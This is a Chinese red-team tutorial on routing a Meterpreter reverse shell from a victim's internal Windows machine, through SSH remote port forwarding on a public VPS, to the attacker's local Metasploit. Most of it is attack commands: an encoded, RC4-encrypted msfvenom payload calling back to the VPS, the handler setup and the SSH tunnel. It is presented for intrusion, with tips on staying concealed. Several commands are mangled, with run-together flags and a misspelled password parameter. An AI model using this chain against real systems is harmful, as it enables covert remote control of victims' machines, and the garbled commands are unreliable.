【ssh隧道】利用ssh隧道将公网meterpreter弹至本地的msf中

不少人私信说如果攻击者的网络和被攻击者的网络都是位于不同地理位置的私网，这种情况下如何反弹shell，今天统一给大家介绍一款最间简单的方式。

利用自己公网VPS的SSH把meterpreter直接弹到本地的msf中

一、环境介绍

ubuntu16-LAMP：假设为入侵者公网的一台linux[vps]机器,公网ip（192.168.3.110 ）
Stack：假设为入侵者本地内网的一台linux机器,本地内网ip（192.168.122.154）
win10-client：假设为目标内网下的一台windows客户机,内网ip: 192.168.5.5

二、环境拓扑

根据上面的环境，画出实战中的网络拓扑图

三、实验操作

1、首先,我们需要先到自己的ubuntu16-LAMP [vps]机器上开启ssh的端口转发功能，编写ssh配置文件：vim /etc/ssh/sshd_config，内容如下

修改

 #AllowTcpForwarding yes#GatewayPorts no#TCPKeepAlive yes#PasswordAuthentication yes

为：

 AllowTcpForwarding yesGatewayPorts yesTCPKeepAlive yesPasswordAuthentication yes

配置完后重启ssh服务

systemctl restart ssh.service

2、在本地的Stack机器上，准备好我们的reverse型payload

msfvenom --platform windows -p windows/meterpreter/reverse_tcp_rc4_dns lhost=192.168.3.110 lport=443 rc4oasswird=kli
on -e x86/shikata_ga_nai -b '\x00' -i 5 -f exe -o dajun_rc4.exe

payload制作成功后，会提示payload的属性信息，如下所示：

[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 521 (iteration=0)
x86/shikata_ga_nai succeeded with size 548 (iteration=1)
x86/shikata_ga_nai succeeded with size 575 (iteration=2)
x86/shikata_ga_nai succeeded with size 602 (iteration=3)
x86/shikata_ga_nai succeeded with size 629 (iteration=4)
x86/shikata_ga_nai chosen with final size 629
Payload size: 629 bytes
Final size of exe file: 73802 bytes
Saved as: dajun_rc4.exe

3、payload准备好之后，顺手继续在本地的Stack机器上做好对应的监听

msf > use exploit/multi/handlermsf > set payload windows/meterpreter/reverse_tcp_rc4_dnsmsf > set lport 53msf > set lhost 192.168.122.154msf > set rc4password klionmsf > set exitonsession falsemsf > exploit-j

4、至此为止,所有的准备工作就完成的差不多了,紧接着,开始整个过程中最关键的一步,在本地的Stack机 器上建立ssh隧道执行远程转发

ssh-C-f-N-g-R 0.0.0.0:443:192.168.122.154:53 root@192.168.3.110-p 22

5、查看端口监听状态

netstat-tulnp | grep ":443"

习惯性的去看下vps上的443端到底口有没有起来

6、最后，把payload丢到目标内网下的Win10-client机器上去执行，即可看到我们的meterpreter在本地成功上线

7、搞定只有，我们来简单回顾一下整个流程

说到这里,可能有些兄弟可能还是会有点儿懵,其实非常简单,一句话概括就是,先在本地机器上和vps建 立好ssh隧道,并在此隧道中执行一条远程转发[如果此处还没搞清远程转发的原理细节,可以先去参考前面 的文章],而被转发的这个端口正好是meterpreter的端口,这样一来,当meterpreter的端口再被弹到vps 上时其实就相当于直接被转到了自己的本地机器上,这样说参不多都应该能明白了。

8、技术小节

在之前的文章我们详细的说明了如果利用ssh隧道的本地端口转发来弹来自公网的meterpreter,此处, 我们又再次说明如果利用ssh隧道的远程端口转发来弹来自公网的meterpreter,大家可根据自己的实际渗 透场景灵活应用,在此之前,你可能还会去用一些lcx之类的工具在vps上做中转,此刻,你完全可以丢到那些 垃圾了,虽然说,meterpreter不是全程被封装在ssh隧道中[其实它只封装了一半],但ssh隧道+payload 自身双重加密还是能在一定程度上保全你自己的,而且,这样建立起的meterpreter也更加稳定,我们貌似一 直在拿meterpreter 举例,其实beacon也是一样的道理,ssh隧道能衍生的技巧还是非常多的,大家可先自 行尝试,待续...

​

原创 大军 Red Teams